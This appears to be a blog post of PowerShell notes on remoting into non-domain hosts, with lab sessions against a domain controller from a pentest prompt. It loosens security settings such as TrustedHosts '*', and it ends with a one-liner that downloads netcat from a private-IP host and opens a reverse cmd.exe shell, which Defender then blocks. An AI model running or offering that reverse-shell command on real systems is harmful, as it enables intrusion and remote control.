jaccostraathof

powershell

Powershell Remoting from a Non-Domain joined Host

 

  1. From an admin shell, enable PS remoting on the machine you wish to access:
New-ItemProperty -Name LocalAccountTokenFilterPolicy `
  -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System `
  -PropertyType DWord -Value 1

Enable-PsRemoting -Force
  1. From an admin shell, configure your client system to allow remote connections to non-domain machines
Set-Item WSMan:\localhost\Client\TrustedHosts -Value "*" -Force
  1. Connect to the remote machine using the exact login credentials. For example, a local user would provide SERVER\username and password.
$SERVER = 'REMOTE_SERVER'
$USER   = 'REMOTE_USER'
Set-ItemProperty 'HKLM:\SOFTWARE\Microsoft\PowerShell\1\ShellIds' ConsolePrompting $true
Invoke-Command -Computer $SERVER -Credential (get-credential "$SERVER\$USER") { ls C:\ }

.

Examples:

PS C:\iso> whoami
puckie\puck
PS C:\iso> hostname
puckie
PS C:\iso> $SERVER = 'DC1.puckcorp.local'
PS C:\iso> $USER   = 'bolke'
PS C:\iso> Set-ItemProperty 'HKLM:\SOFTWARE\Microsoft\PowerShell\1\ShellIds' ConsolePrompting $true
PS C:\iso> Enter-PSSession -Computer $SERVER -Credential (get-credential "$SERVER\$USER")

Windows PowerShell credential request
Enter your credentials.
Password for user DC1.puckcorp.local\bolke: *********

[DC1.puckcorp.local]: PS C:\Users\bolke\Documents> whoami
puckcorp\bolke
[DC1.puckcorp.local]: PS C:\Users\bolke\Documents> hostname
DC1
[DC1.puckcorp.local]: PS C:\Users\bolke\Documents>

 

.

PS C:\PENTEST> Invoke-Command -Computer $SERVER -Credential (get-credential "$SERVER\$USER") { whoami }

Windows PowerShell credential request
Enter your credentials.
Password for user dc1.puckcorp.local\Administrator: **********

puckcorp\administrator
PS C:\PENTEST>

.

or use  Enter-PSSession -Computer $SERVER -Credential (get-credential "$SERVER\$USER")

PS C:\PENTEST> Enter-PSSession -Computer $SERVER -Credential (get-credential "$SERVER\$USER")

Windows PowerShell credential request
Enter your credentials.
Password for user dc1.puckcorp.local\Administrator: **********

[dc1.puckcorp.local]: PS C:\Users\Administrator\Documents> whoami
puckcorp\administrator
[dc1.puckcorp.local]: PS C:\Users\Administrator\Documents> hostname
DC1
[dc1.puckcorp.local]: PS C:\Users\Administrator\Documents>

 

.

Netcat reverse shell

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://192.168.1.41:8000/nc64.exe','nc64.exe')"; Start-Process nc64.exe -NoNewWindow -Argumentlist '192.168.1.41 9001 -e cmd.exe'

-> .Microsoft 365 Defender  detected : Incident name Suspicious ‘PossibleRemoteCmdShell’ behavior was blocked ( so shell killed after 30 sec)